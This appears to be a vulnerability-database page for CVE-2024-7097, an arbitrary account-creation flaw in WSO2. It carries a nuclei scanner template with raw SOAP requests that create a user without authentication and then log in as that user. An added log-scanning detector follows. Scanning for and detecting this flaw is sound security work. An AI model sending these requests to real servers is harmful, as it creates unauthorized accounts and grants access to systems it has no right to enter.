WSO2 User Registration - Arbitrary Account Creation

Published: 01 Jul 2026 03:36:47 | Reported by: ProjectDiscovery | Type: nuclei | Source: github.com | 272 views

A vulnerability in WSO2 products allows arbitrary user accounts to be created, bypassing the self-registration settings.

Related

Reporter | Title | Published | Family
Circl | CVE-2024-7097 | 15 Jan 2025 12:42 | circl
CNNVD | Security vulnerability in multiple WSO2 products | 30 May 2025 00:00 | cnnvd
CVE | CVE-2024-7097 | 30 May 2025 15:04 | cve
Cvelist | CVE-2024-7097 Incorrect Authorization in Multiple WSO2 Products via SOAP Admin Service Allowing Unauthorized User Signup | 30 May 2025 15:04 | cvelist
EUVD | EUVD-2025-16505 | 3 Oct 2025 20:07 | euvd
NVD | CVE-2024-7097 | 30 May 2025 15:15 | nvd
Positive Technologies | PT-2025-3690 | 14 Jan 2025 00:00 | ptsecurity
RedhatCVE | CVE-2024-7097 | 1 Jun 2025 15:36 | redhatcve
VulnCheck KEV | VulnCheck KEV: CVE-2024-7097 | 2 Feb 2025 00:00 | vulncheck_kev
Vulnrichment | CVE-2024-7097 Incorrect Authorization in Multiple WSO2 Products via SOAP Admin Service Allowing Unauthorized User Signup | 30 May 2025 15:04 | vulnrichment
id: CVE-2024-7097

info:
  name: WSO2 User Registration - Arbitrary Account Creation
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
  impact: |
    Unauthenticated attackers can bypass self-registration restrictions to create arbitrary user accounts, potentially gaining unauthorized access to the WSO2 system and its resources.
  remediation: |
    Apply security patches from WSO2 as outlined in security advisory WSO2-2024-3574 to address the arbitrary account creation vulnerability.
  reference:
    - https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/
    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/
  classification:
    epss-score: 0.0054
    epss-percentile: 0.41271
  metadata:
    verified: true
    max-request: 2
    shodan-query: "WSO2 Carbon Server"
  tags: cve,cve2024,wso2,intrusive,auth-bypass,vkev,vuln

variables:
  username: "{{randstr_1}}"
  password: "{{randstr_2}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "urn:addUser"
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
        xmlns:xsd="http://org.apache.axis2/xsd">
           <soapenv:Header/>
           <soapenv:Body>
              <xsd:addUser>
        <xsd:user>
                 <xsd:userName>{{username}}</xsd:userName>
                 <xsd:password>{{password}}</xsd:password>
        </xsd:user>
              </xsd:addUser>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: status
        status:
          - 202
        internal: true

  - raw:
      - |
        POST /services/AuthenticationAdmin HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:aut="http://authentication.services.core.carbon.wso2.org">
           <soapenv:Header/>
           <soapenv:Body>
              <aut:login>
                 <aut:username>{{username}}</aut:username>
                 <aut:password>{{password}}</aut:password>
              </aut:login>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: word
        words:
          - "loginResponse"
          - "<ns:return>true</ns:return>"
        condition: and
# digest: 490a0046304402204d5861a8a3df58260d4e1abaf5f8c371e4446d8892c521c43b331ae803c7e078022007a1e3c92394eb6243bc2f069686bf1d9857c0c22fc8ff534d029836fd2b60f1:922c64590222798bb761d5b6d8e72950
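The template above exercises a two-step flow: an unauthenticated SOAP call to the UserRegistrationAdminService endpoint with SOAPAction urn:addUser (accepted with HTTP 202), followed by a login to AuthenticationAdmin with the freshly created credentials. The following detection helper is an added example, not part of the Vulners page or the ProjectDiscovery template. It scans constructed, Apache-style access log lines from a WSO2 Carbon server for that pattern and correlates the two requests by client IP. The endpoint paths and SOAPAction value come from the template; the assumption that the access log carries the SOAPAction header as a trailing quoted field is a hypothetical reverse-proxy log configuration.

```python
"""
Detection helper for CVE-2024-7097 exploitation attempts (added example, not part
of the Vulners page or the nuclei template). Scans constructed access log lines for
an unauthenticated addUser call to UserRegistrationAdminService followed by a login
via AuthenticationAdmin from the same client IP.
"""
import re
from collections import defaultdict
from datetime import datetime

# Endpoint paths and SOAPAction taken from the nuclei template on this page.
REGISTRATION_PATH = "/services/UserRegistrationAdminService"
LOGIN_PATH = "/services/AuthenticationAdmin"
ADD_USER_ACTION = "urn:addUser"

# Common log format plus a trailing quoted SOAPAction field. That field is an
# assumption about how the reverse proxy in front of Carbon is configured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<soapaction>[^"]*)"$'
)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_self_registration_abuse(lines, window_seconds=300):
    """Return (ip, registration_ts, login_ts) tuples for clients that created a
    user through the admin SOAP service and logged in within window_seconds."""
    registrations = defaultdict(list)
    logins = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if (rec["path"].startswith(REGISTRATION_PATH)
                and rec["soapaction"] == ADD_USER_ACTION
                and rec["status"] == 202):
            registrations[rec["ip"]].append(rec["ts"])
        elif rec["path"].startswith(LOGIN_PATH):
            logins[rec["ip"]].append(rec["ts"])

    hits = []
    for ip, reg_times in registrations.items():
        for reg_ts in reg_times:
            for login_ts in logins.get(ip, []):
                delta = (login_ts - reg_ts).total_seconds()
                if 0 <= delta <= window_seconds:
                    hits.append((ip, reg_ts, login_ts))
    return hits


# Constructed sample lines; the IPs are documentation ranges, not real hosts.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Feb/2025:10:15:01 +0000] "POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1" 202 0 "urn:addUser"',
    '203.0.113.7 - - [02/Feb/2025:10:15:03 +0000] "POST /services/AuthenticationAdmin HTTP/1.1" 200 412 ""',
    '198.51.100.4 - - [02/Feb/2025:10:20:00 +0000] "POST /services/AuthenticationAdmin HTTP/1.1" 200 412 ""',
    '198.51.100.9 - - [02/Feb/2025:11:00:00 +0000] "GET /carbon/admin/login.jsp HTTP/1.1" 200 1532 ""',
]

if __name__ == "__main__":
    for ip, reg_ts, login_ts in find_self_registration_abuse(SAMPLE_LOG):
        print(f"{ip}: addUser accepted at {reg_ts.isoformat()}, "
              f"login at {login_ts.isoformat()}")
```

A lone login to AuthenticationAdmin is normal traffic, which is why the helper only flags an IP after it has seen the addUser call succeed; on a patched server, or one where the admin services are not exposed to the network, the 202 on the registration endpoint should never appear from an unauthenticated source.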


Scores (current as of 04 Feb 2026 07:00)
Vulners AI Score: 5.8 (medium risk)
CVSS 3.1: 4.3
EPSS: 0.0054
SSVC: (empty)
Views: 272